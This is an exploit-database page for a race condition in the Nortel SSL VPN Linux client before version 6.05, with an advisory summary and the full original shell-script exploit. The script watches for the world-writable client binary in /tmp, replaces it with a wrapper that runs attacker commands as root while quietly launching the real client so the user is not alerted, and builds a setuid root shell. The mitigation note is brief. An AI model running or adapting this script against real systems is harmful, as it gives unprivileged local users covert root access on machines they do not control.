header-logo
Suggest Exploit
vendor:
SSL VPN
by:
Jon Hart
7.5
CVSS
HIGH
Race Condition
Unknown
CWE
Product Name: SSL VPN
Affected Version From: Unknown
Affected Version To: 06.05
Patch Exists: No
Related CWE: Unknown
CPE: a:nortel:ssl_vpn
Metasploit:
Other Scripts:
Platforms Tested: Linux
Unknown

Nortel SSL VPN Linux Client race condition

The Linux client that is utilized by versions prior to 6.05 of the Nortel SSL VPN appliance suffers from a number of problems that, in combination, allow an unprivileged local user to obtain root privileges. This particular bug is a race condition in the client's execution process, combined with insecure file permissions, which can be exploited to gain root access. The risk arises if there are untrusted accounts on the machine used to access the Nortel VPN, as those accounts can easily gain local root access.

Mitigation:

To mitigate this vulnerability, it is recommended to have a /tmp directory with nosuid permissions. However, this only helps mitigate the specific exploit and not the underlying vulnerability. The same vulnerability also exists in the Mac client.
Source

Exploit-DB raw data:

#!/bin/sh
# 
# Nortel SSL VPN Linux Client race condition
# 
# Jon Hart <jhart@spoofed.org>
#
# The Linux client that is utilized by versions priot to  6.05 of the Nortel
# SSL VPN appliance suffers from a number of problems that, in combination,
# allow an unprivileged local user to obtain root privileges.
# 
# This particular bug is as follows:
# 1) SSL VPN is initiated from the startNetdirect() javascript call
# 2) A zip archive is downloaded to the local machine which contains three
#    binaries necessary for the client: askpass, client, and surun.  This
#    archive is written to /tmp, chmod'd 777, and then it is extracted into
#    /tmp/NetClient
# 3) All of these files are chmod'd world writable by the following java
#    snippet, which is called on all UNIX client OSs:
#
#   protected boolean setPermissions(String file)
#   {
#      String command = "chmod a+xw " + file;
#      try
#      {
#         Process p = Runtime.getRuntime().exec(command);
#         p.waitFor();
#      }
#      ...
#   }
#
# 4) /tmp/NetClient/surun is executed, which in turn runs
#    /tmp/NetClient/askpass.  This process aquires the root password, and
#    then executes /tmp/NetClient/client via /bin/su and the root password.  
#
# There is clearly a bug in step 2 and 3 whereby files are installed world
# writable.  The bug I chose to exploit is the race condition in step 4,
# combined with the insecure permissions of steps 2 and 3, which (IMO),
# gives root more easily.  The risk here is if you have untrusted accounts
# on the machine from which you access the Nortel VPN, those accounts can
# easily gain local root access.
#
# The exploit is fairly simple.  Wait for /tmp/NetClient/client to appear,
# swap it for our "special version", and wait for a shell.
#
# Notes: a /tmp with nosuid will help mitigate this particular _exploit_,
# but not the vulnerability.  The same vulnerability also exists in the Mac
# client.  
#
# For education and testing purposes only.  Only run this on systems that
# you maintain/control.
#

cleanup() {
   rm -f $TMP_DIR/.*-$$\..*
}


run_cmd() {
   CMD=$@    
   VPN_CLIENT_RUN=`mktemp -t vpn_client_run-$$.XXXXXXXX`

   echo "Waiting for writable client"
   while (true); do
      if [ -w $CLIENT ]; then
         OLD_CLIENT=`mktemp -t old_client-$$.XXXXXXXXXX`
         echo "Saving old client"
         cp $CLIENT $OLD_CLIENT 
         chmod 755 $OLD_CLIENT
         echo "Writing new \"client\""
         echo "#!/bin/sh" > $CLIENT 
         echo "$CMD" >> $CLIENT
         echo "rm -f $VPN_CLIENT_RUN" >> $CLIENT
         # ensure the original client gets run so as to 
         # not alert the user
         echo "exec $OLD_CLIENT \$@" >> $CLIENT
         break
      fi
   done

   SUCCESS=0
   echo "Waiting for new client to be run"
   while (true); do
      if [ ! -f $VPN_CLIENT_RUN ]; then
         SUCCESS=1
         break
      else
         sleep 2
      fi
   done

   if [ $SUCCESS == 1 ]; then
      echo "Success"
      return 0
   else 
      echo "Exploit failed!"
      cleanup
      exit 1
   fi
}

suid_shell() {
   SH_C="sh_c-$$.c"

   # write out setuid shell
   cat >> $SH_C << EOF
   #include <sys/types.h>
   #include <unistd.h>
   int main (int argc, char **argv) {
      setuid(0);
      setgid(0);
      execl("/bin/bash", "bash", NULL);
   }
EOF

   # try like hell to get this shell compiled
   SH=`mktemp -t vpnshell-$$.XXXXXXXXXX`
   gcc -o $SH $SH_C 2>&1 > /dev/null 2>&1
   if [ $? != 0 ]; then
      cc -o $SH $SH_C 2>&1 > /dev/null 2>&1
      if [ $? != 0 ]; then
         echo "Compilation of shell failed"
         echo "Trying backup method..."
         run_cmd "cp /bin/sh $SH && chmod 4755 $SH"
         while (true); do
            if [ -u $SH ]; then
               $SH 
               cleanup
               exit
            else
               sleep 1
            fi
         done
         echo "Failed"
         cleanup
         exit 1
      fi
   fi
   rm -f $SH_C 

   run_cmd "chown root:root $SH && chmod 4755 $SH"

   # wait for our shell to be chmod'd
   SUCCESS=0
   echo "Waiting for suid shell"
   for sleep in `seq 1 60`; do
      if [ -u $SH ]; then
         echo "Success! setuid shell is $SH"
         SUCCESS=1
         break
      else
         sleep 2
      fi
   done

   if [ $SUCCESS == 1 ]; then
      cleanup
      $SH
   else 
      rm -f $SH
      echo "Exploit failed!"
      cleanup
      exit 1
   fi
}

CLIENT="/tmp/NetClient/client"

if [ -f $CLIENT ]; then
   echo "client $CLIENT already exists -- forcing stop"
   $CLIENT --stop
   for sleep in `seq 1 60`; do
      if [ ! -f $CLIENT ]; then
         break
      fi
      sleep 1
   done
fi

# hack to figure out where temp files get put...
TMP_FILE=`mktemp -t $$`
TMP_DIR=`dirname $TMP_FILE`
rm -f $TMP_FILE

trap cleanup 1 2 3 15

# two modes of operation -- get a root shell, or run a cmd as root.
if [ -z "$1" ]; then
   suid_shell
else 
   run_cmd $1 
fi

cleanup

# milw0rm.com [2007-02-21]

Navigation

Suggest Exploit

Services By CQR